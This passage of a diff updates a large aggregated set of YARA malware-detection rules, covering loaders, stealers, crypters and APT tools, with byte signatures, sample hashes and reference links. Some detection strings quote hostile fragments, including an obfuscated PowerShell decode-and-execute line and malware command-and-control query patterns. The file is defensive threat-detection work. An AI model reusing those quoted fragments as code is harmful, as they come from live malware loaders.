-		logic_hash = "4cc4ebffe7bf712b412a060536acc51d94381d24b46e5494195ae17482076cd6"
-		score = 75
-		quality = 81
 		tags = ""
 
 	strings:
-		$s1 = {7d 3d 2b 2b 24 7b}
-		$s2 = {24 28 20 20 29}
-		$s3 = {24 7B [1-10] 7D 20 20 2B 20 20 24}
-		$s4 = {24 7B [1-10] 7D 24 7B}
+		$b1 = { 48 8D 0D ?? ?? 05 00 E8 ?? ?? EF FF }
+		$ftp = "FOUND FTP"
 
 	condition:
-		2 of ( $s* )
+		all of them
 }
-rule RUSSIANPANDA_Win_Mal_Koi_Loader : FILE
+rule RUSSIANPANDA_Easycrypter : FILE
 {
 	meta:
-		description = "Detects Koi Loader"
+		description = "Detects EasyCrypter"
 		author = "RussianPanda"
-		id = "a608558d-97c8-5161-a6eb-29fd420458a8"
-		date = "2024-04-04"
-		modified = "2024-04-04"
+		id = "73b01a6c-dcd1-502e-a431-daf82ab3ed50"
+		date = "2024-01-05"
+		modified = "2024-01-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Koi/win_mal_Koi_loader.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/EasyCrypter/easycrypter.yar#L1-L16"
 		license_url = "N/A"
-		hash = "47e208687c2fb40bdbaa17e368aaa1bd"
-		logic_hash = "4f909865c6d274804c3fa7f66822d7bea71bb93e7c6a422ebaf220df056ac095"
+		hash = "60063c99fda3b6c5c839ec1c310b03e8f9c7c8823f2eb7bf75e22c6d738ffa8f"
+		logic_hash = "761ed4629150453009b76d9c2ad251754009b464550b92dab3395fa30422f6ef"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {27 11 68 05}
-		$s2 = {15 B1 B3 09}
-		$s3 = {B5 96 AA 0D}
-		$s4 = {74 [0-10] C1 E9 18}
+		$s1 = {F6 17 [16-20] 80 2F 36 [16-20] 80 07 87}
+		$s2 = {81 38 50 45 00 00 [20-22] 8B 88 A0 00 00 00 [2-4] 8B 80 A4 00 00 00 [5-7] 8B 40 50 [50-56] 89 0C 24 89 44 24 04 C7 44 24 08 00 30 00 00 C7 44 24 0C 04 00 00 00 FF 15 [3] 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $s* )
+		uint16( 0 ) == 0x5A4D and $s1 and $s2
 }
-rule RUSSIANPANDA_Win_Mal_Koistealer_PS
+rule RUSSIANPANDA_Fakebat_Powershell
 {
 	meta:
-		description = "Detects KoiStealer PowerShell script"
+		description = "Detects FakeBat PowerShell scripts"
 		author = "RussianPanda"
-		id = "6dfdb39c-1b6a-5969-9c2d-e09869af6e0f"
-		date = "2024-04-04"
-		modified = "2024-04-04"
+		id = "76149a6f-c370-5e48-82cc-c89b545c0aa8"
+		date = "2023-12-01"
+		modified = "2023-12-01"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Koi/win_mal_KoiStealer_PS.yar#L1-L12"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/FakeBat/fakebat_powershell.yar#L1-L13"
 		license_url = "N/A"
-		hash = "4f55be0b55ec67dfda42b88e9c743a2a"
-		logic_hash = "8a60a1d770eb4b5048762ddfd4657fdf7a430b09eb454ae5a5bb3103460907db"
+		logic_hash = "df6b30d97ac6c9b248fed0d901e8a0a6ad1d855483a5006b008b839d9961092a"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "index.php?id=$guid&subid="
-		$s2 = "$config"
+		$s1 = "$LoadDomen/?status=start&av=" nocase
+		$s2 = "$xxx.gpg" nocase
 
 	condition:
 		all of ( $s* )
 }
-rule RUSSIANPANDA_Win_Mal_Koi_Loader_Decrypted : FILE
+rule RUSSIANPANDA_Jinxloader : FILE
 {
 	meta:
-		description = "Detects decrypted Koi Loader"
+		description = "Detects JinxLoader Golang version"
 		author = "RussianPanda"
-		id = "71de93d3-5c9f-5994-a54d-d4455d500280"
-		date = "2024-04-04"
-		modified = "2024-04-04"
+		id = "25570c99-5938-5be0-a153-a07be0d0571c"
+		date = "2024-01-02"
+		modified = "2024-01-02"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Koi/win_mal_Koi_loader_decrypted.yar#L1-L12"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/JinxLoader/JinxLoader-1-2-2024.yar#L1-L16"
 		license_url = "N/A"
-		hash = "1901593e0299930d46b963866f33a93b"
-		logic_hash = "f73ada7185ff109afe1e186a0fb7b4420b3d0e04c93c7c5423243db97eb34e49"
+		hash = "6bd7ff5d764214f239af2bb58b368308c2d04f1147678c2f638f37a893995f71"
+		logic_hash = "13dee435fb4d40c629c0a30b6f655b87f14b10a6f6acf61d00e6c692c9bb0ff1"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$s1 = {73 00 64 00 32 00 2E 00 70 00 73 00 31 00}
-		$s2 = {25 00 74 00 65 00 6D 00 70 00 25 00 5C 00 25 00 70 00 61 00 74 00 68 00 73 00 25}
+		$s1 = {72 75 6E 74 69 6D 65 2E 67 6F 70 61 6E 69 63}
+		$s2 = {48 8D 05 4D 6E 07 00 BB 0A 00 00 00}
+		$s3 = {73 65 6C 66 5F 64 65 73 74 72 75 63 74 2E 62 61 74}
+		$s4 = {48 8D 1D B7 24 08 00 [25] E8 EF FC E4 FF}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $s* )
+		uint16( 0 ) == 0x5A4D and all of ( $s* ) and filesize < 9MB
 }
-rule RUSSIANPANDA_Win_Mal_Mpxdropper : FILE
+
+rule RUSSIANPANDA_Illyrianstealer : FILE
 {
 	meta:
-		description = "Detects MpxDropper"
+		description = "Detects Illyrian Stealer"
 		author = "RussianPanda"
-		id = "26ee0a12-c727-5953-8ebb-dd8a8d772561"
-		date = "2024-03-01"
-		modified = "2024-03-01"
+		id = "2f85e87c-6883-5f41-a37c-00f9e93f61bf"
+		date = "2024-01-08"
+		modified = "2024-01-08"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/MpxDropper/mal_win_MpxDropper.yar#L1-L11"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/IllyrianStealer/illyrian_stealer.yar#L2-L18"
 		license_url = "N/A"
-		hash = "3a44a45afbfe5fc7cdeb3723e05c4e892b079abdb7d1e8d6fc70496ef0a14d5d"
-		logic_hash = "e8d2672553c7f44e1cc177fad6596bd58b5c32a7541f91ce1207e6b21ef6e52d"
+		hash = "fae0aed6173804e8c22027cbb0c121eedd927f16ea7e2b23662dbe6e016980e8"
+		logic_hash = "2012d401d3e7ce2d4d6ea12ed01a30b7d3e18f4ed47dbf70d43bae6c328960ea"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {43 3a 5c 55 73 65 72 73 5c 6d 70 78 31 36 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73}
+		$s1 = "get_TotalPhysicalMemory"
+		$s2 = "\\b(bitcoincash)[a-zA-HJ-NP-Z0-9]{36,54}\\b" wide
+		$s3 = "[Crypto]" wide
+		$s4 = "|Black|" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* ) and filesize < 50KB and pe.imports ( "mscoree.dll" )
 }
 /*
  * YARA Rule Set
  * Repository Name: Check Point
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 4
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -161253,48 +161843,6 @@ rule CHECK_POINT_Injector_ZZ_Dotrunpex_Oldnew : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and ( $regPath or $rsrcName or 1 of ( $koiVM* ) ) and 9 of ( $implmap* ) and 1 of ( $modulerefKernel* ) and 1 of ( $modulerefNtdll* )
 }
-rule CHECK_POINT_Malware_Bumblebee_Packed
-{
-	meta:
-		description = "Detects the packer used by bumblebee, the rule is based on the code responsible for allocating memory for a critical structure in its logic."
-		author = "Marc Salinas @ CheckPoint Research"
-		id = "35f00c87-c26e-5189-b66d-15d5a1b1dd20"
-		date = "2022-07-13"
-		modified = "2023-04-10"
-		reference = "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Checkpoint/malware_bumblebee_packed.yar#L1-L31"
-		license_url = "N/A"
-		logic_hash = "063209aad7ab8a0be46fd578a16b04afc086f930cbdb6c2f7b02824f704d7330"
-		score = 75
-		quality = 85
-		tags = ""
-		malware_family = "BumbleBee"
-		dll_jul = "6bc2ab410376c1587717b2293f2f3ce47cb341f4c527a729da28ce00adaaa8db"
-		dll_jun = "82aab01a3776e83695437f63dacda88a7e382af65af4af1306b5dbddbf34f9eb"
-		dll_may = "a5bcb48c0d29fbe956236107b074e66ffc61900bc5abfb127087bb1f4928615c"
-		iso_jul = "ca9da17b4b24bb5b24cc4274cc7040525092dffdaa5922f4a381e5e21ebf33aa"
-		iso_jun = "13c573cad2740d61e676440657b09033a5bec1e96aa1f404eed62ba819858d78"
-		iso_may = "b2c28cdc4468f65e6fe2f5ef3691fa682057ed51c4347ad6b9672a9e19b5565e"
-		zip_jun = "7024ec02c9670d02462764dcf99b9a66b29907eae5462edb7ae974fe2efeebad"
-		zip_may = "68ac44d1a9d77c25a97d2c443435459d757136f0d447bfe79027f7ef23a89fce"
-
-	strings:
-		$heapalloc = {
-            48 8? EC [1-6]           // sub     rsp, 80h
-            FF 15 ?? ?? 0? 00 [0-5]  // call    cs:GetProcessHeap
-            33 D2                    // xor     edx, edx        ; dwFlags
-            4? [2-5]                 // mov     rcx, rax        ; hHeap
-            4? ?? ??                 // mov     r8d, ebx        ; dwBytes
-            FF 15 ?? ?? 0? 00        // call    cs:HeapAlloc
-            [8 - 11]                 // (load params)
-            48 89 05 ?? ?? ?? 00     // mov     cs:HeapBufferPtr, rax
-            E8 ?? ?? ?? ??           // call    memset
-            4? 8B ?? ?? ?? ?? 00     // mov     r14, cs:HeapBufferPtr
-        }
-
-	condition:
-		$heapalloc
-}
 rule CHECK_POINT_Apt_Nazar_Component_Guids
 {
 	meta:
@@ -161400,11 +161948,53 @@ rule CHECK_POINT_Injector_ZZ_Dotrunpex : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and ( $regPath or $rsrcName or 1 of ( $koiVM* ) ) and 24 of ( $implmap* ) and 1 of ( $modulerefKernel* ) and 1 of ( $modulerefNtdll* ) and 1 of ( $modulerefAdvapi* )
 }
+rule CHECK_POINT_Malware_Bumblebee_Packed
+{
+	meta:
+		description = "Detects the packer used by bumblebee, the rule is based on the code responsible for allocating memory for a critical structure in its logic."
+		author = "Marc Salinas @ CheckPoint Research"
+		id = "35f00c87-c26e-5189-b66d-15d5a1b1dd20"
+		date = "2022-07-13"
+		modified = "2023-04-10"
+		reference = "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Checkpoint/malware_bumblebee_packed.yar#L1-L31"
+		license_url = "N/A"
+		logic_hash = "063209aad7ab8a0be46fd578a16b04afc086f930cbdb6c2f7b02824f704d7330"
+		score = 75
+		quality = 85
+		tags = ""
+		malware_family = "BumbleBee"
+		dll_jul = "6bc2ab410376c1587717b2293f2f3ce47cb341f4c527a729da28ce00adaaa8db"
+		dll_jun = "82aab01a3776e83695437f63dacda88a7e382af65af4af1306b5dbddbf34f9eb"
+		dll_may = "a5bcb48c0d29fbe956236107b074e66ffc61900bc5abfb127087bb1f4928615c"
+		iso_jul = "ca9da17b4b24bb5b24cc4274cc7040525092dffdaa5922f4a381e5e21ebf33aa"
+		iso_jun = "13c573cad2740d61e676440657b09033a5bec1e96aa1f404eed62ba819858d78"
+		iso_may = "b2c28cdc4468f65e6fe2f5ef3691fa682057ed51c4347ad6b9672a9e19b5565e"
+		zip_jun = "7024ec02c9670d02462764dcf99b9a66b29907eae5462edb7ae974fe2efeebad"
+		zip_may = "68ac44d1a9d77c25a97d2c443435459d757136f0d447bfe79027f7ef23a89fce"
+
+	strings:
+		$heapalloc = {
+            48 8? EC [1-6]           // sub     rsp, 80h
+            FF 15 ?? ?? 0? 00 [0-5]  // call    cs:GetProcessHeap
+            33 D2                    // xor     edx, edx        ; dwFlags
+            4? [2-5]                 // mov     rcx, rax        ; hHeap
+            4? ?? ??                 // mov     r8d, ebx        ; dwBytes
+            FF 15 ?? ?? 0? 00        // call    cs:HeapAlloc
+            [8 - 11]                 // (load params)
+            48 89 05 ?? ?? ?? 00     // mov     cs:HeapBufferPtr, rax
+            E8 ?? ?? ?? ??           // call    memset
+            4? 8B ?? ?? ?? ?? 00     // mov     r14, cs:HeapBufferPtr
+        }
+
+	condition:
+		$heapalloc
+}
 /*
  * YARA Rule Set
  * Repository Name: Dragon Threat Labs
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 7
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -161414,32 +162004,29 @@ rule CHECK_POINT_Injector_ZZ_Dotrunpex : FILE
  *
  * NO LICENSE SET
  */
-rule DRAGON_THREAT_LABS_Apt_C16_Win_Swisyn : MEMORY FILE
+rule DRAGON_THREAT_LABS_Apt_C16_Win_Wateringhole
 {
 	meta:
-		description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+		description = "Detects code from APT wateringhole"
 		author = "@dragonthreatlab"
-		id = "af369075-aca3-576d-a10b-849703ffb4f1"
+		id = "4958f894-91a7-56b4-90f0-40085c03382c"
 		date = "2015-01-11"
 		modified = "2016-09-27"
 		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win_swisyn.yar#L1-L17"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win_wateringhole.yar#L1-L14"
 		license_url = "N/A"
-		hash = "a6a18c846e5179259eba9de238f67e41"
-		logic_hash = "2fa29d3b17aa37501131132640953645d0089c9bc5ec13ffed7a498ad89c1558"
+		logic_hash = "e866499ec77984f5bacf3f5e352393b63e0dd08fd8fd57b4990292a1dc7fbcbe"
 		score = 75
-		quality = 28
-		tags = "MEMORY, FILE"
+		quality = 80
+		tags = ""
 
 	strings:
-		$mz = {4D 5A}
-		$str1 = "/ShowWU" ascii
-		$str2 = "IsWow64Process"
-		$str3 = "regsvr32 "
-		$str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
+		$str1 = "function runmumaa()"
+		$str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
+		$str3 = "function MoSaklgEs7(k)"
 
 	condition:
-		$mz at 0 and all of ( $str* )
+		any of ( $str* )
 }
 rule DRAGON_THREAT_LABS_Apt_C16_Win_Memory_Pcclient : MEMORY APT
 {
@@ -161450,7 +162037,7 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win_Memory_Pcclient : MEMORY APT
 		date = "2015-01-11"
 		modified = "2016-09-27"
 		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win_memory_pcclient.yar#L4-L19"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L4-L19"
 		license_url = "N/A"
 		hash = "ec532bbe9d0882d403473102e9724557"
 		logic_hash = "e863fcbcbde61db569a34509061732371143f38734a0213dc856dc3c9188b042"
@@ -161467,6 +162054,29 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win_Memory_Pcclient : MEMORY APT
 	condition:
 		all of them
 }
+rule DRAGON_THREAT_LABS_Apt_C16_Win_Disk_Pcclient : DISK
+{
+	meta:
+		description = "Encoded version of pcclient found on disk"
+		author = "@dragonthreatlab"
+		id = "40e9133c-60e8-5fec-be56-1115c8bde9b1"
+		date = "2015-01-11"
+		modified = "2016-09-27"
+		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L21-L33"
+		license_url = "N/A"
+		hash = "55f84d88d84c221437cd23cdbc541d2e"
+		logic_hash = "47e9588ef1f350ee0d2aecc7686d9e4df1ad6c19f27d749e31340eff7e31adcb"
+		score = 75
+		quality = 80
+		tags = "DISK"
+
+	strings:
+		$header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
+
+	condition:
+		$header at 0
+}
 rule DRAGON_THREAT_LABS_Apt_C16_Win32_Dropper : DROPPER FILE
 {
 	meta:
@@ -161476,7 +162086,7 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win32_Dropper : DROPPER FILE
 		date = "2015-01-11"
 		modified = "2016-09-27"
 		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win32_dropper.yar#L1-L18"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L35-L52"
 		license_url = "N/A"
 		hash = "ad17eff26994df824be36db246c8fb6a"
 		logic_hash = "bb29bcf5e62cb1a55d7f0cb87b53bace26b99f858513dc4e544d531f70f54281"
@@ -161495,51 +162105,32 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win32_Dropper : DROPPER FILE
 	condition:
 		$mz at 0 and all of ( $str* )
 }
-rule DRAGON_THREAT_LABS_Apt_Win_Mocelpa
-{
-	meta:
-		description = "APT malware; Mocelpa, downloader."
-		author = "@int0x00"
-		id = "2cf2ba5e-86b1-5533-9e14-61113e5f574d"
-		date = "2023-04-10"
-		modified = "2023-04-10"
-		reference = "https://github.com/DragonThreatLabs/IntelReports/blob/master/DTL-06282015-01.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_win_mocelpa.yar#L1-L11"
-		license_url = "N/A"
-		logic_hash = "0331c0f690ac7a8870b3f4012f2828ed23850340edcf0b6ff80bc408d9174977"
-		score = 75
-		quality = 28
-		tags = ""
-
-	strings:
-		$mz = {4D 5A}
-		$ssl_hello = {16 03 01 00 6B 01 00 00 67 03 01 54 B4 C9 7B 4F CF BC 5A 01 EC 4A 73 C8 6D BB C0 86 9F 7B A9 08 6A 60 37 05 81 97 1A C8 9F 45 E5 00 00 18 00 2F 00 35 00 05 00 0A C0 13 C0 14 C0 09 C0 0A 00 32 00 38 00 13 00 04 01 00 00 26 00 00 00 12 00 10 00 00 0D 77 77 77 2E 61 70 70 6C 65 2E 63 6F 6D 00 0A 00 06 00 04 00 17 00 18 00 0B 00 02 01 00}
-
-	condition:
-		($mz at 0 ) and ( $ssl_hello )
-}
-rule DRAGON_THREAT_LABS_Apt_C16_Win_Disk_Pcclient : DISK
+rule DRAGON_THREAT_LABS_Apt_C16_Win_Swisyn : MEMORY FILE
 {
 	meta:
-		description = "Encoded version of pcclient found on disk"
+		description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
 		author = "@dragonthreatlab"
-		id = "40e9133c-60e8-5fec-be56-1115c8bde9b1"
+		id = "af369075-aca3-576d-a10b-849703ffb4f1"
 		date = "2015-01-11"
 		modified = "2016-09-27"
 		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win_disk_pcclient.yar#L1-L13"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L54-L70"
 		license_url = "N/A"
-		hash = "55f84d88d84c221437cd23cdbc541d2e"
-		logic_hash = "47e9588ef1f350ee0d2aecc7686d9e4df1ad6c19f27d749e31340eff7e31adcb"
+		hash = "a6a18c846e5179259eba9de238f67e41"
+		logic_hash = "2fa29d3b17aa37501131132640953645d0089c9bc5ec13ffed7a498ad89c1558"
 		score = 75
-		quality = 80
-		tags = "DISK"
+		quality = 28
+		tags = "MEMORY, FILE"
 
 	strings:
-		$header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
+		$mz = {4D 5A}
+		$str1 = "/ShowWU" ascii
+		$str2 = "IsWow64Process"
+		$str3 = "regsvr32 "
+		$str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
 
 	condition:
-		$header at 0
+		$mz at 0 and all of ( $str* )
 }
 rule DRAGON_THREAT_LABS_Apt_C16_Win64_Dropper : DROPPER FILE
 {
@@ -161550,7 +162141,7 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win64_Dropper : DROPPER FILE
 		date = "2015-01-11"
 		modified = "2016-09-27"
 		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win64_dropper.yar#L1-L18"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L87-L104"
 		license_url = "N/A"
 		logic_hash = "df905711eca68c698ad6340e88ae99fdcae918c86ec2b7c26b62eead54fef892"
 		score = 75
@@ -161567,35 +162158,34 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win64_Dropper : DROPPER FILE
 	condition:
 		$mz at 0 and all of ( $str* )
 }
-rule DRAGON_THREAT_LABS_Apt_C16_Win_Wateringhole
+rule DRAGON_THREAT_LABS_Apt_Win_Mocelpa
 {
 	meta:
-		description = "Detects code from APT wateringhole"
-		author = "@dragonthreatlab"
-		id = "4958f894-91a7-56b4-90f0-40085c03382c"
-		date = "2015-01-11"
-		modified = "2016-09-27"
-		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L72-L85"
+		description = "APT malware; Mocelpa, downloader."
+		author = "@int0x00"
+		id = "2cf2ba5e-86b1-5533-9e14-61113e5f574d"
+		date = "2023-04-10"
+		modified = "2023-04-10"
+		reference = "https://github.com/DragonThreatLabs/IntelReports/blob/master/DTL-06282015-01.pdf"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_win_mocelpa.yar#L1-L11"
 		license_url = "N/A"
-		logic_hash = "e866499ec77984f5bacf3f5e352393b63e0dd08fd8fd57b4990292a1dc7fbcbe"
+		logic_hash = "0331c0f690ac7a8870b3f4012f2828ed23850340edcf0b6ff80bc408d9174977"
 		score = 75
-		quality = 80
+		quality = 28
 		tags = ""
 
 	strings:
-		$str1 = "function runmumaa()"
-		$str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
-		$str3 = "function MoSaklgEs7(k)"
+		$mz = {4D 5A}
+		$ssl_hello = {16 03 01 00 6B 01 00 00 67 03 01 54 B4 C9 7B 4F CF BC 5A 01 EC 4A 73 C8 6D BB C0 86 9F 7B A9 08 6A 60 37 05 81 97 1A C8 9F 45 E5 00 00 18 00 2F 00 35 00 05 00 0A C0 13 C0 14 C0 09 C0 0A 00 32 00 38 00 13 00 04 01 00 00 26 00 00 00 12 00 10 00 00 0D 77 77 77 2E 61 70 70 6C 65 2E 63 6F 6D 00 0A 00 06 00 04 00 17 00 18 00 0B 00 02 01 00}
 
 	condition:
-		any of ( $str* )
+		($mz at 0 ) and ( $ssl_hello )
 }
 /*
  * YARA Rule Set
  * Repository Name: Microsoft
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 21
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -161605,6 +162195,37 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win_Wateringhole
  *
  * NO LICENSE SET
  */
+
+rule MICROSOFT_Devilstongue_Hijackdll : FILE
+{
+	meta:
+		description = "Detects SOURGUM's DevilsTongue hijack DLL"
+		author = "Microsoft Threat Intelligence Center (MSTIC)"
+		id = "b5de2a8c-e0c8-5c8c-bb65-aee5701b4bb3"
+		date = "2021-07-15"
